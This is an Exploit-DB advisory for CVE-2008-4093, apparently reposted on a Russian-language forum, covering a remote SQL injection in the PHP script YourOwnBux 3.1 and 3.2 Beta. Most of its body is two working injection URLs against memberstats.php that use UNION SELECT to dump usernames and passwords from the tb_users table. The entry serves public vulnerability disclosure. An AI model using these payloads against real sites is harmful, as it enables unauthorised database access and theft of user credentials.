- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6321
- Проверка EDB
-
- Пройдено
- Автор
- ~!DOK_TOR!~
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4093
- Дата публикации
- 2008-08-27
Код:
YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
3.2 Beta version
Exploit:
http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*
3.1 version
Exploit:
http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*
# milw0rm.com [2008-08-27]- Источник
- www.exploit-db.com
